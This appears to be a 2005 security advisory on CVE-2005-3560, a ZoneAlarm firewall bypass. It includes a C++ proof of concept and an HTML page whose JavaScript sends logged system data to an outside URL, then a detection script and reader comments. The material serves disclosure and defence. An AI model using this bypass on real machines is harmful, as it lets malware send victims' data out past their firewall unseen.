"Zone Alarm Pro and Internet Security Suite are firewall programs for Microsoft Windows."
By exploiting Zone Labs' trust in certain web-based programs, malicious programs can bypass Zone Alarm Pro and Internet Security Suite protection and send information about the system to attackers.
Credit:
The information has been provided by Debasis Mohanty.
The original article can be found at: http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
Vulnerable Systems:
* Zone Alarm Pro version 6.0.x
* Zone Alarm Internet Security Suite version 6.0.x
* Zone Alarm Firewall with Anti-Spyware version 6.1.x
* Zone Alarm Firewall with Anti-Virus version 6.0.x
* Zone Alarm Firewall (Free Version) version 6.0.x
Zone Alarm products with Advanced Program Control or OS Firewall technology enabled detect and block almost all of the APIs (Shell, ShellExecuteEx, SetWindowText, SetDlgItem, etc.) that malicious programs commonly use to send data over HTTP by piggybacking on other trusted programs. However, a malicious program (a Trojan, worm, etc.) can still make outbound connections to an attacker-controlled site by piggybacking on the trusted Internet browser, using an HTML modal dialog together with a few lines of JavaScript. This assumes the default browser (IE, Firefox, etc.) is authorized to access the Internet; in a default installation of ZoneAlarm Pro, IE is allowed Internet access.
Using the ShowHTMLDialog() function, any malicious program can create a modal dialog box that displays HTML content, and the page it loads can then redirect to the attacker's site. ZA Pro and Internet Security Suite were observed to be unable to block Internet access made this way. A malicious program can thus send data out over HTTP to the attacker and, in the same exchange, receive command instructions back.
On successful exploitation the malicious program is able to send the victim's details and personal system information to the attacker, which can further lead to complete system compromise.
Proof of Concept:
osfwbypass-demo.c (compile as C++, since it calls IMoniker::Release through the C++ interface):

    #include <windows.h>
    #include <mshtmhst.h>   // SHOWHTMLDIALOGFN
    #include <urlmon.h>     // CreateURLMoniker
    #pragma comment(lib, "urlmon.lib")

    BOOL LoadHtmlDialog(void)
    {
        HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));
        if (hinstMSHTML)
        {
            SHOWHTMLDIALOGFN* pfnShowHTMLDialog;
            // Open a modal dialog box of HTML content type
            // (GetProcAddress takes an ANSI name, so no TEXT() here)
            pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML, "ShowHTMLDialog");
            if (pfnShowHTMLDialog)
            {
                IMoniker *pURLMoniker = NULL;
                // Invoke the HTML file containing the data to be sent via HTTP
                BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
                CreateURLMoniker(NULL, bstrURL, &pURLMoniker);
                if (pURLMoniker)
                {
                    (*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
                    pURLMoniker->Release();
                }
                SysFreeString(bstrURL);
            }
            FreeLibrary(hinstMSHTML);
        }
        return TRUE;
    }
    /* Eof */
modal-dialog.htm:

    <html>
    <head>
    <meta http-equiv="Content-Language" content="en-us">
    <title>Redirection Dialog</title>
    <script language="JavaScript">
    // Here goes the information logged by the malicious program which will
    // be sent to the evil site via an HTTP request
    var sTargetURL = "http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[YourInformation Here]";
    window.location.href = sTargetURL;
    window.close();
    </script>
    </head>
    </html>
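From the defender's side, the useful signal is the one the PoC above produces: ShowHTMLDialog hosts MSHTML inside the calling process, so the HTTP request originates from the malicious executable itself, not from iexplore.exe. The following Python is an added example (not from the advisory or from Zone Labs) that correlates a constructed, simplified Sysmon-style event stream to flag a non-browser process that loads MSHTML.DLL and then opens its own outbound HTTP(S) connection; the event layout, process names and browser allow-list are assumptions for the example.

```python
"""Flag the ShowHTMLDialog piggyback pattern: a process that is not a
browser loads MSHTML.DLL and afterwards makes an outbound HTTP(S) connection.
The event format is a constructed, simplified Sysmon-like stream
(ImageLoaded / NetworkConnect), not a real log source."""
from collections import defaultdict

# Processes that are expected to host MSHTML and talk HTTP (assumed allow-list)
BROWSERS = {"iexplore.exe", "firefox.exe"}
HTML_ENGINE = "mshtml.dll"
HTTP_PORTS = {80, 443}

# Constructed sample events: (timestamp, pid, image path, event type, detail)
SAMPLE_EVENTS = [
    (1, 100, r"C:\Program Files\Internet Explorer\iexplore.exe", "ImageLoaded",
     r"C:\WINDOWS\system32\mshtml.dll"),
    (2, 100, r"C:\Program Files\Internet Explorer\iexplore.exe", "NetworkConnect",
     "203.0.113.5:80"),
    (3, 200, r"C:\Temp\osfwbypass-demo.exe", "ImageLoaded",
     r"C:\WINDOWS\system32\mshtml.dll"),
    (4, 200, r"C:\Temp\osfwbypass-demo.exe", "NetworkConnect", "203.0.113.5:80"),
    (5, 300, r"C:\WINDOWS\explorer.exe", "NetworkConnect", "203.0.113.7:445"),
]


def find_piggyback(events):
    """Return (pid, process name, destination) for every non-browser process
    that loaded MSHTML.DLL and later connected outbound to an HTTP(S) port."""
    loaded_mshtml = defaultdict(bool)  # pid -> has loaded mshtml.dll so far
    hits = []
    for _ts, pid, image, event, detail in sorted(events):
        name = image.rsplit("\\", 1)[-1].lower()
        if event == "ImageLoaded" and detail.lower().endswith(HTML_ENGINE):
            loaded_mshtml[pid] = True
        elif event == "NetworkConnect" and loaded_mshtml[pid] and name not in BROWSERS:
            port = int(detail.rsplit(":", 1)[-1])
            if port in HTTP_PORTS:
                hits.append((pid, name, detail))
    return hits


if __name__ == "__main__":
    for pid, name, dest in find_piggyback(SAMPLE_EVENTS):
        print(f"suspicious: pid={pid} {name} loaded mshtml.dll then connected to {dest}")
```

Only the demo executable is reported; the browser's own MSHTML load and explorer.exe's SMB connection do not match the pattern.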
CVE Information:
CVE-2005-3560
Disclosure Timeline:
10th Oct, 2005 - Bug Originally Discovered
15th Oct, 2005 - Vendor Reported
15th Oct, 2005 - Vendor acknowledged the report
17th Oct, 2005 - Vendor asked for more information
19th Oct, 2005 - Vendor provided with more information and the version info on which the exploit was tested.
29th Oct, 2005 - Final follow up with the vendor but no response
8th Nov, 2005 - Public Disclosure
Subject: Doesn't surprise me
Date: 5 Dec. 2005
From: none

I had an issue with removing ZA and having my internet connection break totally. I had to reinstall ZA, then delete everything but vsmon and leave it running, otherwise no internet. I moved to Sygate well before this and as always was checking out software. Well, I never was able to remove ZA without breaking my internet connection. I was stuck with it till I was able to reformat my computer. They never offered me any help and only pointed me to instructions on removing ZA so that I could do a clean install of ZA. Tried them and was left without internet.
Subject: Kerio Personal Firewall 4.2.2 is also vulnerable!
Date: 6 Dec. 2005
From: Andry

I've tested with Kerio Personal Firewall 4.2.2 and it's vulnerable as well.
Subject: How to find a fix
Date: 7 Dec. 2005
From: bcifrespeedy.com.ar

Is there any fix that exists for this problem? How can I find out if my firewall works well and is not vulnerable?
Thank you
Subject: Kaspersky Firewall and Norton 2005 firewall are both vulnerable
Date: 7 Dec. 2005
From: Mark

Kaspersky Firewall and Norton 2005 firewall are both vulnerable
Subject: Lavasoft firewall has this exploit
Date: 8 Dec. 2005
From: boxitas

I installed the new Lavasoft firewall 5 days ago and it has the same exploit as stated above. I saw it for myself last night; I wanted to test it under the most risky sites and that porn site (as a test).
And I found that it blocked very well till one of the sites did a redirect to another page using the "click back to last page", and it happened at least a dozen times.
Subject: I learned about this the hard way
Date: 25 Aug. 2006
From: Pete

My ZA crashed suddenly, with an error message. Had the X icon in the systray. I re-started ZA and started a virus scan and went to bed. When I woke up the screen was black, with an error message telling me that there was a boot read problem. I checked the drive with System Mechanic: MBR & partition both OK. Hooked the drive to my Linux box to see if I could see the contents of the drive. No joy: there weren't any contents. Put the drive back in the Wintel box and re-imaged with the restore disk. Worked fine. Good thing the data was backed up.
I don't know if something got in or someone got in, but the effect was the same: the content of the drive was completely wiped.
Anyone know how to block this thing? Contact me at macghee@hotmail.com